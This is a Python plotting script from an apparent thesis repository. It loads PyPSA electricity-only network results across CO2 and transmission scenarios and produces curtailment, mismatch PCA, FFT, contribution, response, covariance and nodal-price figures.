] | null | null | null | Software/Network plotters/elec_only_OMEGA_plot.py | JonasVind/Master_Project_Code-Plots | f3efea1a30738b119bf6958cc490b940c90e2909 | [
"CC-BY-4.0"
] | null | null | null | # Import libraries
import os
import sys
import pypsa
import numpy as np
import pandas as pd
#from sympy import latex
import time
import math
# Timer
t0 = time.time() # Start a timer
# Import functions file (one directory up from this script)
sys.path.append(os.path.split(os.getcwd())[0])
from functions_file import *
# Directory of file
#directory = os.path.split(os.path.split(os.path.split(os.getcwd())[0])[0])[0] + "\\Data\\elec_only\\"
directory = os.path.split(os.path.split(os.getcwd())[0])[0] + "\\Data\\elec_only\\"
# File name
# NOTE(review): `file` shadows a historical builtin and is reused/reassigned
# by the bar-plot loops further below.
file = "postnetwork-elec_only_0.125_0.05.h5"
# Generic file name
titleFileName = file
# Figure path
#figurePath = os.path.split(os.path.split(os.path.split(os.getcwd())[0])[0])[0] + "\\Figures\\elec_only\\"
figurePath = os.path.split(os.path.split(os.getcwd())[0])[0] + "\\Figures\\elec_only\\"
##############################################################################
##############################################################################
################################# Pre Analysis ###############################
##############################################################################
##############################################################################
# ------------------- Curtailment - CO2 constraints (Elec) ------------------#
# Path to save files
path = figurePath + "Pre Analysis\\"
# List of file names
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# List of constraints
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = ""#"Electricity Curtailment - " + file[12:-14]
fig = Curtailment(directory=directory, files=filename_CO2, title=title, constraints=constraints, fontsize=14, ylim=[-1,20], figsize=[6, 4.5])
SavePlot(fig, path, title=(file[12:-14] + " - Curtailment Elec (CO2)"))
# --------------- Curtailment - Transmission constraints (Elec) --------------#
# List of file names
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# List of constraints
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = ""#"Electricity Curtailment - " + file[12:-14]
fig = Curtailment(directory=directory, files=filename_trans, title=title, constraints=constraints, fontsize=14, rotation=-17.5, ylim=[-2,60], legendLoc="upper right", figsize=[6, 4.8])
SavePlot(fig, path, title=(file[12:-14] + " - Curtailment Elec (trans)"))
##############################################################################
##############################################################################
################################### MISMATCH #################################
##############################################################################
##############################################################################
# ------- Electricity produced by technology (Elec CO2 and Trans) -----------#
# Path to save files
path = figurePath + "Mismatch\\"
# List of file names (CO2 constraint sweep)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
                "postnetwork-elec_only_0.125_0.5.h5",
                "postnetwork-elec_only_0.125_0.4.h5",
                "postnetwork-elec_only_0.125_0.3.h5",
                "postnetwork-elec_only_0.125_0.2.h5",
                "postnetwork-elec_only_0.125_0.1.h5",
                "postnetwork-elec_only_0.125_0.05.h5"]
# List of constraints
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
fig = ElecProductionOvernight(directory=directory, filenames=filename_CO2, constraints=constraints, fontsize=14, figsize=[6,6])
SavePlot(fig, path, title=(file[12:-14] + " - total elec generation (CO2)"))
# List of file names (transmission constraint sweep)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
                  "postnetwork-elec_only_0.0625_0.05.h5",
                  "postnetwork-elec_only_0.125_0.05.h5",
                  "postnetwork-elec_only_0.25_0.05.h5",
                  "postnetwork-elec_only_0.375_0.05.h5"]
# List of constraints
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
fig = ElecProductionOvernight(directory=directory, filenames=filename_trans, constraints=constraints, rotation=-25, fontsize=14, figsize=[6,6.3])
SavePlot(fig, path, title=(file[12:-14] + " - total elec generation (trans)"))
# ------------------ Map Capacity Plots (Elec) ------------------#
# Path to save files
path = figurePath + "Mismatch\\Map Capacity\\"
# --- Elec ---
# Import network
network = pypsa.Network(directory+file)
# Generator / storage-energy / storage-power capacity maps.
fig1, fig2, fig3 = MapCapacityOriginal(network, titleFileName, ncol=3)
SavePlot(fig1, path, title=(file[12:-3] + " - Map Capacity Elec Generator"))
SavePlot(fig2, path, title=(file[12:-3] + " - Map Capacity Elec Storage Energy"))
SavePlot(fig3, path, title=(file[12:-3] + " - Map Capacity Elec Storage Power"))
# -------------------- Map Energy Plot (Elec) -------------------#
# Path for saving file
path = figurePath + "Mismatch\\Map Energy Distribution\\"
# Import network
network = pypsa.Network(directory+file)
# --- Elec ---
figElec = MapCapacityElectricityEnergy(network, file)
SavePlot(figElec, path, title=(file[12:-3] + " - Elec Energy Production"))
# --------------------- Map PC Plot (Elec) ----------------------#
# Path to save plots
path = figurePath + "Mismatch\\Map PC\\"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data (two-letter country codes)
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# --- Elec ---
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation (summed per country)
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity (generation minus load, per country per hour)
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# ----------------------- Map Plot (Elec) -----------------------#
# Plot map PC for mismatch electricity (first 6 principal components)
titlePlotElec = "Mismatch for electricity only"
for i in np.arange(6):
    fig = MAP(eigenVectorsElec, eigenValuesElec, dataNames, (i + 1))#, titlePlotElec, titleFileName)
    title = (file[12:-3] + " - Map PC Elec Mismatch (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ----------------------- FFT Plot (Elec) -----------------------#
# Path to save FFT plots
path = figurePath + "Mismatch\\FFT\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
# Frequency spectrum of each of the first 6 principal components.
for i in np.arange(6):
    fig = FFTPlot(TElec.T, varianceExplainedElec, PC_NO = (i+1))
    title = (file[12:-3] + " - FFT Elec Mismatch (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# -------------------- Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Mismatch\\Seasonal\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
# Seasonal (daily/yearly) profile of each principal component.
for i in np.arange(6):
    fig = seasonPlot(TElec, timeIndex, PC_NO=(i+1), PC_amount=6,dpi=400)
    title = (file[12:-3] + " - Seasonal Plot Elec Mismatch (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# -------------------- FFT + Seasonal Plot (Elec) ---------------------#
# Path to save combined timeseries plots
path = figurePath + "Mismatch\\Timeseries\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for i in np.arange(6):
    fig = FFTseasonPlot(TElec, timeIndex, varianceExplainedElec, PC_NO=(i+1), PC_amount=6,dpi=200)
    title = (file[12:-3] + " - Timeseries Plot Elec Mismatch (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ----------------- Contribution plot (Elec) ------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Contribution\\"
# --- Elec ---
# Contribution of each technology to the principal components.
dircConElec = Contribution(network, "elec")
lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
for i in range(6):
    fig = ConPlot(eigenValuesElec,lambdaCollectedConElec,i+1,10,suptitle=("Electricity Contribution - " + file[12:-3]),dpi=200)
    title = (file[12:-3] + " - Contribution Plot Elec (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------- Response plot (Elec) -------------------- #
# Path to save response plots
path = figurePath + "Mismatch\\Response\\"
# --- Elec ---
# Response of the system (storage, links, backup) projected onto the PCs.
dircResElec = ElecResponse(network,True)
lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
for i in range(6):
    fig = ConPlot(eigenValuesElec,lambdaCollectedResElec,i+1,10,suptitle=("Electricity Response - " + file[12:-3]),dpi=200)
    title = (file[12:-3] + " - Response Plot Elec (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------- Covariance plot (Elec) -------------------- #
# Path to save covariance plots
path = figurePath + "Mismatch\\Covariance\\"
# --- Elec ---
# Covariance between contribution and response terms per PC.
covMatrixElec = CovValueGenerator(dircConElec, dircResElec , True, normConstElec, eigenVectorsElec).T
for i in range(6):
    fig = ConPlot(eigenValuesElec,covMatrixElec,i+1,10,suptitle=("Electricity Covariance - " + file[12:-3]),dpi=200)
    title = (file[12:-3] + " - Covariance Plot Elec (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------- Combined Projection plot (Elec) -------------------- #
# Path to save projection plots
path = figurePath + "Mismatch\\Projection\\"
# --- Elec ---
for i in range(6):
    fig = CombConPlot(eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec, i+1, depth = 6) #, suptitle=("Electricity Projection - " + file[12:-3]),dpi=200)
    title = (file[12:-3] + " - Projection Plot Elec (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------- PC1 and PC2 combined plot (Elec) -------------------- #
# Path to save combined plots
path = figurePath + "Mismatch\\Combined Plot\\"
# --- Elec ---
fig = PC1and2Plotter(TElec, timeIndex, [1,2], eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec,PCType="withProjection")#,suptitle=("Electricity Mismatch - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Combined Plot Elec (lambda 1 & 2)")
SavePlot(fig, path, title)
# ---------------------- Bar plot CO2 constraint --------------------------- #
# Path to save bar plots
path = figurePath + "Mismatch\\Bar\\"
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
                "postnetwork-elec_only_0.125_0.5.h5",
                "postnetwork-elec_only_0.125_0.4.h5",
                "postnetwork-elec_only_0.125_0.3.h5",
                "postnetwork-elec_only_0.125_0.2.h5",
                "postnetwork-elec_only_0.125_0.1.h5",
                "postnetwork-elec_only_0.125_0.05.h5"]
# Variable to store mismatch PC components for each network
barMatrixCO2Elec = []
# NOTE(review): this loop rebinds the module-level `file`; later title
# strings use whatever value it held after the last iteration.
for file in filename_CO2:
    # --------------------------- Electricity -------------------------------#
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data
    dataNames = network.buses.index.str.slice(0,2).unique()
    # Get time stamps
    timeIndex = network.loads_t.p_set.index
    # Electricity load for each country
    loadElec = network.loads_t.p_set[dataNames]
    # Solar PV generation
    generationSolar = network.generators_t.p[dataNames + " solar"]
    generationSolar.columns = generationSolar.columns.str.slice(0,2)
    # Onshore wind generation
    generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    # Offshore wind generation
    # Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
    generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationOffwind = generationOffwind.replace(np.nan,0)
    # RoR generations
    # Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
    generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationRoR = generationRoR.replace(np.nan,0)
    # Combined generation for electricity
    generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
    # Mismatch electricity
    mismatchElec = generationElec - loadElec
    # PCA on mismatch for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
    # Append value to matrix
    barMatrixCO2Elec.append(varianceExplainedElec)
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = "" #"Number of PC describing variance of network as a function of $CO_{2}$ constraint"
xlabel = "$CO_{2}$ constraint"
suptitleElec = "" #("Electricity Mismatch - " + file[12:-14])
fig = BAR(barMatrixCO2Elec, 7, filename_CO2, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, bbox=(0.5,-0.28))
titleBarCO2Elec = (file[12:-14] + " - Bar CO2 Elec Mismatch")
SavePlot(fig, path, titleBarCO2Elec)
# ------------------ Bar plot Transmission constraint ----------------------- #
# Path
#path = "C:/Users/jense/OneDrive - Aarhus Universitet/Dokumenter/Århus Universitet/Kandidat - Civilingeniør/11. Semester/Master Thesis/Shared Documents/Figures/elec_only/Bar/"
path = figurePath + "Mismatch\\Bar\\"
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
                  "postnetwork-elec_only_0.0625_0.05.h5",
                  "postnetwork-elec_only_0.125_0.05.h5",
                  "postnetwork-elec_only_0.25_0.05.h5",
                  "postnetwork-elec_only_0.375_0.05.h5"]
# Variable to store mismatch PC components for each network
barMatrixTransmissionElec = []
# For each transmission-constraint network: rebuild the country-level electricity
# mismatch (generation - load) and record how much variance each PC explains.
for file in filename_trans:
    # --------------------------- Electricity -------------------------------#
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data (two-letter country codes, e.g. "DK")
    dataNames = network.buses.index.str.slice(0,2).unique()
    # Get time stamps (hourly, one year => 8760 entries)
    timeIndex = network.loads_t.p_set.index
    # Electricity load for each country
    loadElec = network.loads_t.p_set[dataNames]
    # Solar PV generation; rename columns "XX solar" -> "XX"
    generationSolar = network.generators_t.p[dataNames + " solar"]
    generationSolar.columns = generationSolar.columns.str.slice(0,2)
    # Onshore wind generation, summed per country.
    # NOTE(review): DataFrame.groupby(axis=1) is deprecated in pandas >= 2.1 — confirm pandas version.
    generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    # Offshore wind generation
    # Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
    generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationOffwind = generationOffwind.replace(np.nan,0)
    # RoR generations
    # Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
    generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationRoR = generationRoR.replace(np.nan,0)
    # Combined generation for electricity
    generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
    # Mismatch electricity
    mismatchElec = generationElec - loadElec
    # PCA on mismatch for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
    # Append value to matrix
    barMatrixTransmissionElec.append(varianceExplainedElec)
# Bar-plot labels: one per transmission-capacity scenario (0x..6x current capacity).
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = "Number of PC describing variance of network as a function of transmission constraint"
xlabel = "Transmission constraint"
# `file` holds the last element of filename_trans here (loop variable leaks in Python).
suptitleElec = ("Electricity Mismatch - " + file[12:-14])
fig = BAR(barMatrixTransmissionElec, 7, filename_trans, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, rotation=-17.5, bbox=(0.5,-0.28))
titleBarTransmissionElec = (file[12:-14] + " - Bar Trans Elec Mismatch")
SavePlot(fig, path, titleBarTransmissionElec)
# ------------------ Change in contribution and response CO2 ----------------------- #
# Collect, per CO2 network: projected contribution terms, response terms, and
# mismatch/response covariance terms (all projected onto mismatch eigenvectors).
# Variable to store lambda values
lambdaContributionElec = []
lambdaResponseElec = []
lambdaCovarianceElec = []
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
                "postnetwork-elec_only_0.125_0.5.h5",
                "postnetwork-elec_only_0.125_0.4.h5",
                "postnetwork-elec_only_0.125_0.3.h5",
                "postnetwork-elec_only_0.125_0.2.h5",
                "postnetwork-elec_only_0.125_0.1.h5",
                "postnetwork-elec_only_0.125_0.05.h5"]
for file in filename_CO2:
    # --------------------------- Electricity -------------------------------#
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data (two-letter country codes)
    dataNames = network.buses.index.str.slice(0,2).unique()
    # Get time stamps
    timeIndex = network.loads_t.p_set.index
    # Electricity load for each country
    loadElec = network.loads_t.p_set[dataNames]
    # Solar PV generation; rename "XX solar" -> "XX"
    generationSolar = network.generators_t.p[dataNames + " solar"]
    generationSolar.columns = generationSolar.columns.str.slice(0,2)
    # Onshore wind generation, summed per country
    generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    # Offshore wind generation
    # Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
    generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationOffwind = generationOffwind.replace(np.nan,0)
    # RoR generations
    # Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
    generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationRoR = generationRoR.replace(np.nan,0)
    # Combined generation for electricity
    generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
    # Mismatch electricity
    mismatchElec = generationElec - loadElec
    # PCA on mismatch for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
    # Contribution Elec: project generation/load contributions onto the mismatch PCs
    dircConElec = Contribution(network, "elec")
    lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
    lambdaContributionElec.append(lambdaCollectedConElec)
    # Response Elec: project system responses (storage, links, ...) onto the same PCs
    dircResElec = ElecResponse(network,True)
    lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
    lambdaResponseElec.append(lambdaCollectedResElec)
    # Covariance Elec between contribution and response terms
    covMatrix = CovValueGenerator(dircConElec, dircResElec , True, normConstElec, eigenVectorsElec)
    lambdaCovarianceElec.append(covMatrix.T)
#%%
# Re-import to pick up edits to functions_file during interactive (#%%-cell) runs;
# redundant when the script is executed top-to-bottom.
from functions_file import *
# general terms
pathContibution = figurePath + "Mismatch\\Change in Contribution\\"
pathResponse = figurePath + "Mismatch\\Change in Response\\"
pathCovariance = figurePath + "Mismatch\\Change in Covariance\\"
# Below: each quantity is plotted twice — main-text version (rotate=True, first 2 PCs)
# and appendix version (rotate=False, first 6 PCs). `file` still holds the last
# filename from the CO2 loop above and is used only for the save-file title.
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of CO2 constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont (CO2)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec contribution (appendix, 6 PCs)
figtitle = "Change in electricity contribution as a function of CO2 constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont app (CO2)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec response
figtitle = "Change in electricity response as a function of CO2 constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec response (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec response (appendix, 6 PCs)
figtitle = "Change in electricity response as a function of CO2 constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec response app (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of CO2 constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response (appendix, 6 PCs)
figtitle = "Change in electricity covariance response as a function of CO2 constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response app (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in covariance'
figtitle = "Change in electricity covariance between mismatch and response as a function of CO2 constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance (CO2)"
SavePlot(fig, pathCovariance, saveTitle)
# Plot change in covariance (appendix, 6 PCs)
figtitle = "Change in electricity covariance between mismatch and response as a function of CO2 constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance app (CO2)"
SavePlot(fig, pathCovariance, saveTitle)
#%%
# ------------------ Change in contribution and response transmission ----------------------- #
# Same analysis as the CO2 section above, but sweeping transmission-capacity scenarios.
# Variable to store lambda values
lambdaContributionElec = []
lambdaResponseElec = []
lambdaCovarianceElec = []
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
                  "postnetwork-elec_only_0.0625_0.05.h5",
                  "postnetwork-elec_only_0.125_0.05.h5",
                  "postnetwork-elec_only_0.25_0.05.h5",
                  "postnetwork-elec_only_0.375_0.05.h5"]
for file in filename_trans:
    # --------------------------- Electricity -------------------------------#
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data (two-letter country codes)
    dataNames = network.buses.index.str.slice(0,2).unique()
    # Get time stamps
    timeIndex = network.loads_t.p_set.index
    # Electricity load for each country
    loadElec = network.loads_t.p_set[dataNames]
    # Solar PV generation; rename "XX solar" -> "XX"
    generationSolar = network.generators_t.p[dataNames + " solar"]
    generationSolar.columns = generationSolar.columns.str.slice(0,2)
    # Onshore wind generation, summed per country
    generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    # Offshore wind generation
    # Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
    generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationOffwind = generationOffwind.replace(np.nan,0)
    # RoR generations
    # Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
    generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationRoR = generationRoR.replace(np.nan,0)
    # Combined generation for electricity
    generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
    # Mismatch electricity
    mismatchElec = generationElec - loadElec
    # PCA on mismatch for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
    # Contribution Elec projected onto mismatch PCs
    dircConElec = Contribution(network, "elec")
    lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
    lambdaContributionElec.append(lambdaCollectedConElec)
    # Response Elec projected onto the same PCs
    dircResElec = ElecResponse(network,True)
    lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
    lambdaResponseElec.append(lambdaCollectedResElec)
    # Covariance Elec between contribution and response terms
    covMatrix = CovValueGenerator(dircConElec, dircResElec , True, normConstElec,eigenVectorsElec)
    lambdaCovarianceElec.append(covMatrix.T)
# general terms
pathContibution = figurePath + "Mismatch\\Change in Contribution\\"
pathResponse = figurePath + "Mismatch\\Change in Response\\"
pathCovariance = figurePath + "Mismatch\\Change in Covariance\\"
# Each quantity is plotted twice: main-text version (rotate=True, 2 PCs) and
# appendix version (rotate=False, 6 PCs). `file` is the last transmission filename.
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of transmission constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont (trans)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec contribution (appendix, 6 PCs)
figtitle = "Change in electricity contribution as a function of transmission constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont app (trans)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec response
figtitle = "Change in electricity response as a function of transmission constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec response (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec response (appendix, 6 PCs)
figtitle = "Change in electricity response as a function of transmission constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec response app (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of transmission constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response (appendix, 6 PCs)
figtitle = "Change in electricity covariance response as a function of transmission constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response app (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in covariance
figtitle = "Change in electricity covariance as a function of transmission constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance (trans)"
SavePlot(fig, pathCovariance, saveTitle)
# Plot change in covariance (appendix, 6 PCs)
figtitle = "Change in electricity covariance as a function of transmission constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance app (trans)"
SavePlot(fig, pathCovariance, saveTitle)
#%%
##############################################################################
##############################################################################
################################ NODAL PRICE #################################
##############################################################################
##############################################################################
# PCA of country-level nodal electricity prices for the 95%-CO2-reduction,
# 2x-current-transmission network.
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data (two-letter country codes)
dataNames = network.buses.index.str.slice(0,2).unique()
# ----------------------- Map PC Plot (Elec + Heat) --------------------#
# Path to save plots
path = figurePath + "Nodal Price\\Map PC\\"
# --- Elec ---
# Prices for electricity for each country, capped at 465 €/MWh by FilterPrice
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# PCA on nodal prices for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
# Plot map PC for electricity nodal prices (first 6 PCs)
